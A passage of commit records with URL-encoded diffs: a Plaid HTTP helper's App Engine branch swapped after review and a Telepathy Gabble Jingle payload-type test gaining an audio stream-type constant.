self.model._meta.app_label, self.model._meta.model_name%0A redirect = reverse('admin:%25s_%25s_changelist' %25 info,)%0A%0A return HttpResponseRedirect(redirect)
a5950853ae7cfe9ac4fce7f297722231feae2f44
switch if/else per David's review comments
plaid/http.py
plaid/http.py
############################################################################## # Helper module that encapsulates the HTTPS request so that it can be used # with multiple runtimes. PK Mar. 14 ############################################################################## import os import urllib # Command line def _requests_http_request(url, method, data): import requests if method.upper() == 'GET': return requests.get(url, data = data) elif method.upper() == 'POST': return requests.post(url, data = data) elif method.upper() == 'PUT': return requests.put(url, data = data) elif method.upper() == 'DELETE': return requests.delete(url, data = data) elif method.upper() == 'PATCH': return requests.patch(url, data = data) assert False # Google App Engine def _urlfetch_http_request(url, method, data): from google.appengine.api import urlfetch method = method.upper() qs = urllib.urlencode(data) if method == 'POST': payload = qs else: payload = None url += '?' + qs response = urlfetch.fetch(url, follow_redirects = True, method = method, payload = payload ) response.ok = response.status_code >= 200 and response.status_code < 300 return response _is_appengine = None def http_request(url, method, data = {}): global _is_appengine if _is_appengine is None: ss = os.environ.get('SERVER_SOFTWARE', None) _is_appengine = (ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/'))) if not _is_appengine: return _requests_http_request(url, method, data) else: return _urlfetch_http_request(url, method, data)
Python
0
@@ -1588,12 +1588,8 @@ if -not _is_ @@ -1615,24 +1615,24 @@ return _ -requests +urlfetch _http_re @@ -1678,32 +1678,32 @@ return _ -urlfetch +requests _http_reques @@ -1716,16 +1716,26 @@ method, data)%0A%0A + %0A%0A
8bf370724f92aef0783cb1d15f1c2a39ca9986c4
define a MEDIA_STREAM_TYPE_AUDIO constant
tests/twisted/jingle/payload-types.py
tests/twisted/jingle/payload-types.py
""" Regression test for https://bugs.freedesktop.org/show_bug.cgi?id=18918 """ from gabbletest import exec_test, make_result_iq, sync_stream, \ send_error_reply from servicetest import make_channel_proxy, unwrap, tp_path_prefix, \ call_async, EventPattern from twisted.words.xish import domish import jingletest import gabbletest import dbus import time def test(q, bus, conn, stream): jt = jingletest.JingleTest(stream, 'test@localhost', 'foo@bar.com/Foo') # Connecting conn.Connect() q.expect('dbus-signal', signal='StatusChanged', args=[1, 1]) q.expect('stream-authenticated') q.expect('dbus-signal', signal='PresenceUpdate', args=[{1L: (0L, {u'available': {}})}]) q.expect('dbus-signal', signal='StatusChanged', args=[0, 1]) self_handle = conn.GetSelfHandle() # We need remote end's presence for capabilities jt.send_remote_presence() # Gabble doesn't trust it, so makes a disco event = q.expect('stream-iq', query_ns='http://jabber.org/protocol/disco#info', to='foo@bar.com/Foo') jt.send_remote_disco_reply(event.stanza) # Force Gabble to process the caps before calling RequestChannel sync_stream(q, stream) handle = conn.RequestHandles(1, [jt.remote_jid])[0] path = conn.RequestChannel( 'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 1, handle, True) channel = bus.get_object(conn.bus_name, path) signalling_iface = make_channel_proxy(conn, path, 'Channel.Interface.MediaSignalling') media_iface = make_channel_proxy(conn, path, 'Channel.Type.StreamedMedia') group_iface = make_channel_proxy(conn, path, 'Channel.Interface.Group') # FIXME: Hack to make sure the disco info has been processed - we need to # send Gabble some XML that will cause an event when processed, and # wait for that event (until # https://bugs.freedesktop.org/show_bug.cgi?id=15769 is fixed) el = domish.Element(('jabber.client', 'presence')) el['from'] = 'bob@example.com/Bar' stream.send(el.toXml()) q.expect('dbus-signal', signal='PresenceUpdate') # OK, now we can continue. End of hack # Test that codec parameters are correctly sent in <parameter> children of # <payload-type> rather than as attributes of the latter. media_iface.RequestStreams(handle, [0]) # 0 == MEDIA_STREAM_TYPE_AUDIO # S-E gets notified about new session handler, and calls Ready on it e = q.expect('dbus-signal', signal='NewSessionHandler') assert e.args[1] == 'rtp' session_handler = make_channel_proxy(conn, e.args[0], 'Media.SessionHandler') session_handler.Ready() e = q.expect('dbus-signal', signal='NewStreamHandler') stream_id = e.args[1] stream_handler = make_channel_proxy(conn, e.args[0], 'Media.StreamHandler') stream_handler.NewNativeCandidate("fake", jt.get_remote_transports_dbus()) codecs = dbus.Array( [ (96, 'speex', 0, 16000, 0, {'vbr': 'on'}) ], signature='(usuuua{ss})') stream_handler.Ready(codecs) stream_handler.StreamState(2) e = q.expect('stream-iq') content = list(e.query.elements())[0] assert content.name == 'content' for child in content.elements(): if child.name == 'description': description = child break assert description is not None # there should be one <payload-type> tag for speex: assert len(list(description.elements())) == 1 payload_type = list(description.elements())[0] assert payload_type.name == 'payload-type' assert payload_type['name'] == 'speex' # the vbr parameter should not be an attribute on the <payload-type>, but # a child <parameter/> tag assert 'vbr' not in payload_type.attributes assert len(list(payload_type.elements())) == 1 parameter = list(payload_type.elements())[0] assert parameter.name == 'parameter' assert parameter['name'] == 'vbr' assert parameter['value'] == 'on' channel.Close() # Test that codec parameters are correctly extracted from <parameter> # children of <payload-type> rather than from attributes of the latter. jt.incoming_call({'misc': 'other'}) e = q.expect('dbus-signal', signal='NewSessionHandler') assert e.args[1] == 'rtp' session_handler = make_channel_proxy(conn, e.args[0], 'Media.SessionHandler') session_handler.Ready() e = q.expect('dbus-signal', signal='NewStreamHandler') stream_id = e.args[1] stream_handler = make_channel_proxy(conn, e.args[0], 'Media.StreamHandler') stream_handler.Ready( dbus.Array( [], signature='(usuuua{ss})')) e = q.expect('dbus-signal', signal='SetRemoteCodecs') for codec in e.args[0]: id, name, type, rate, channels, parameters = codec assert len(parameters) == 1, parameters assert parameters['misc'] == 'other', parameters print e.args[0] # Test completed, close the connection conn.Disconnect() q.expect('dbus-signal', signal='StatusChanged', args=[2, 1]) return True if __name__ == '__main__': exec_test(test)
Python
0.000017
@@ -365,16 +365,44 @@ t time%0A%0A +MEDIA_STREAM_TYPE_AUDIO = 0%0A %0Adef tes @@ -2376,19 +2376,8 @@ e, %5B -0%5D) # 0 == MEDI @@ -2395,16 +2395,18 @@ PE_AUDIO +%5D) %0A%0A #